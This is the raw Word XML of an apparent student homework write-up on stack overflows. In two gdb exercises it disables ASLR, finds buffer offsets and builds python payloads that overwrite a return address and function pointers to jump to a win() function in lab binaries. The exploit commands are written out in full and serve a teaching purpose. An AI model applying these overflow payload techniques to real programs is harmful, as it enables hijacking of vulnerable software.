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9890" w14:textId="6F04A227" w:rsidR="00193E15" w:rsidRDefault="00EF6222">
      <w:r>
        <w:t>HW1 Stack Overflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F19C89" w14:textId="7FCEC873" w:rsidR="00EF6222" w:rsidRDefault="00EF6222">
      <w:r>
        <w:t>Problem 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8D18E" w14:textId="0CBED6C8" w:rsidR="00EF6222" w:rsidRDefault="00EF6222" w:rsidP="00EF6222">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure ASLR is turned off (‘set disable-randomization on’ in gdb)</w:t>
      </w:r>
      <w:r w:rsidR="002E355E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65972D87" w14:textId="769C9F61" w:rsidR="00EF6222" w:rsidRDefault="00EF6222" w:rsidP="00EF6222">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compile and load file in gdb</w:t>
      </w:r>
      <w:r w:rsidR="002E355E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA972E7" w14:textId="5D934A77" w:rsidR="00EF6222" w:rsidRDefault="00EF6222" w:rsidP="00EF6222">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>‘pattern create 100’ to create a random buffer input</w:t>
      </w:r>
      <w:r w:rsidR="002E355E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05488B2D" w14:textId="254BEB5A" w:rsidR="00EF6222" w:rsidRDefault="00EF6222" w:rsidP="00EF6222">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run program, copy created pattern into buffer</w:t>
      </w:r>
      <w:r w:rsidR="002E355E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA74C8" w14:textId="35790163" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="000C3A85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E370FF3" wp14:editId="7A780AF4">
            <wp:extent cx="4088765" cy="1956466"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="956092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92619" name="Picture 95609261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18" t="9858" r="11245" b="52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038" cy="1959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B2B51" w14:textId="33076E8E" w:rsidR="00EF6222" w:rsidRDefault="00EF6222" w:rsidP="00EF6222">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Program fails, gives address of RIP</w:t>
      </w:r>
      <w:r w:rsidR="002E355E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF597A0" w14:textId="5B8A7811" w:rsidR="00EF6222" w:rsidRDefault="000C3A85" w:rsidP="00EF6222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F5DFD5F" wp14:editId="38DC41A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>473710</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>417830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4173855" cy="1864995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1263923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3114" name="Picture 126392311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8" t="34570" r="27157" b="45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186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222">
        <w:t>‘pattern search $rip’ or ‘pattern search $rsp’ to find offset from buffer to be reached. Offset here is 72 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF51C12" w14:textId="468C66A1" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="000C3A85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E9E412" w14:textId="1C74759F" w:rsidR="002E355E" w:rsidRDefault="002E355E" w:rsidP="002E355E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76E7D32" wp14:editId="28D1A6D9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>448310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>435398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5167630" cy="388620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="381554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3114" name="Picture 126392311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8" t="94790" r="15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address of win() so program can be redirected to the method. Address was 0x401152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B45825" w14:textId="77777777" w:rsidR="002E355E" w:rsidRDefault="002E355E" w:rsidP="002E355E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FD22BB" w14:textId="01E7B44B" w:rsidR="00EF6222" w:rsidRDefault="002E355E" w:rsidP="00EF6222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E16D2B" wp14:editId="22A4492B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>448310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>656801</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5231130" cy="1083310"/>
            <wp:effectExtent l="0" t="0" r="7620" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="175070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5222" name="Picture 175070522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2" b="79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1083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222">
        <w:t>Create payload using ‘echo -n `python -c ‘from struct import pack; print “a”*72 + pack (“&lt;Q”, 0x</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="00EF6222">
        <w:t>401152)’` &gt; S1.txt</w:t>
      </w:r>
      <w:r w:rsidR="000C3A85">
        <w:t>. -n is necessary to exclude null termination in string, which fgets will read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9406C" w14:textId="076D59DE" w:rsidR="00EF6222" w:rsidRDefault="002E355E" w:rsidP="002E355E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4AECCE" wp14:editId="78E46B35">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>457200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1300480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5119370" cy="508000"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="652390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3114" name="Picture 126392311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8" t="87872" r="15256" b="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5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222">
        <w:t>Run payload using ‘run &lt; S1.txt’ in gdb</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF5E6C1" w14:textId="77777777" w:rsidR="00A34693" w:rsidRDefault="00A34693" w:rsidP="00A34693"/>
    <w:p w14:paraId="788AD7AE" w14:textId="09A0FC0A" w:rsidR="00A34693" w:rsidRDefault="00A34693" w:rsidP="00A34693"/>
    <w:p w14:paraId="795CD9E8" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="68A5E4C5" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="03DB66B3" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="6F5048CB" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="4FC19ABF" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="16854E16" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="1ED4428E" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="2CF38B7B" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="65C08B79" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="526E8842" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="1EB048F6" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="4EF672EE" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="3121B8D1" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="45403209" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="1D284C54" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="102E2DF6" w14:textId="77777777" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693"/>
    <w:p w14:paraId="378FC38E" w14:textId="75185AB7" w:rsidR="000C3A85" w:rsidRDefault="000C3A85" w:rsidP="00A34693">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Problem 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620AF32" w14:textId="3F647808" w:rsidR="00120FDF" w:rsidRDefault="00120FDF" w:rsidP="00120FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure ASLR is turned off (‘set disable-randomization on’ in gdb).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08387F4B" w14:textId="709B19EC" w:rsidR="000C3A85" w:rsidRDefault="00120FDF" w:rsidP="00A34693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compile and load file in gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0B2D7" w14:textId="5B85DB8F" w:rsidR="00120FDF" w:rsidRDefault="00120FDF" w:rsidP="00A34693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set breakpoint at line 27</w:t>
      </w:r>
      <w:r w:rsidR="00877790">
        <w:t xml:space="preserve"> (after fgets executes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FDE6F" w14:textId="6F2F3543" w:rsidR="00877790" w:rsidRDefault="00877790" w:rsidP="00A34693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Print addresses of buffer, funcs, fp0, and fp1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24B6F8" w14:textId="3D2DE8DB" w:rsidR="00071377" w:rsidRDefault="00DF560F" w:rsidP="00A34693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E5082ED" wp14:editId="0644BE5D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>464820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4441825" cy="5494020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="718462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2681" name="Picture 71846268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2" t="15024" r="20513" b="11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825" cy="549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7790">
        <w:t>Determine number of bytes between buffer and funcs (40 in hex -&gt; 64 byte</w:t>
      </w:r>
      <w:r w:rsidR="00071377">
        <w:t>s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6309E1" w14:textId="1F4A90CA" w:rsidR="00877790" w:rsidRDefault="00877790" w:rsidP="00071377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049A6660" w14:textId="0A1FF18B" w:rsidR="00964693" w:rsidRDefault="00877790" w:rsidP="00964693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create payload that overwrites fp0 and fp1 with itself and fp2 with fp0. Use command ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00877790">
        <w:t xml:space="preserve">python -c 'from struct import pack;print "a" * 64 + pack("&lt;Q",0x401152) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00877790">
        <w:lastRenderedPageBreak/>
        <w:t>pack("&lt;Q",0x401169) + pack("&lt;Q",0x401152)'` &gt; S2.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ in separate shell. String is </w:t>
      </w:r>
      <w:r w:rsidR="00964693">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DF6EC6D" wp14:editId="1361D3F8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>464820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>415290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5456555" cy="624840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="67496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6386" name="Picture 6749638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16" b="88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55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null terminated, but null byte is not written into funcs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D3249" w14:textId="77777777" w:rsidR="00964693" w:rsidRDefault="00964693" w:rsidP="00964693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD30C0C" w14:textId="7260F0A4" w:rsidR="00877790" w:rsidRDefault="00964693" w:rsidP="00A34693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A235AE6" wp14:editId="4AC0204E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>457200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>208915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3886094" cy="4725035"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="64283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3935" name="Picture 6428393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2" t="26798" r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094" cy="472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7790">
        <w:t>Run payload using ‘run &lt; S2.txt’ in gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D86597" w14:textId="765D3FAE" w:rsidR="00964693" w:rsidRDefault="00964693" w:rsidP="00964693"/>
    <w:sectPr w:rsidR="009646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68B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E66EC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B088E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E66EC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260361">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1781686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22"/>
    <w:rsid w:val="00071377"/>
    <w:rsid w:val="000C3A85"/>
    <w:rsid w:val="00120FDF"/>
    <w:rsid w:val="00193E15"/>
    <w:rsid w:val="001F181F"/>
    <w:rsid w:val="002E355E"/>
    <w:rsid w:val="003B763D"/>
    <w:rsid w:val="004E56D9"/>
    <w:rsid w:val="00877790"/>
    <w:rsid w:val="00964693"/>
    <w:rsid w:val="00A34693"/>
    <w:rsid w:val="00B57BF7"/>
    <w:rsid w:val="00DF560F"/>
    <w:rsid w:val="00EF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9959"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{22647F66-0E0E-4392-A2F2-41814777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Holcomb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Holcomb</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-21T17:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-21T19:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>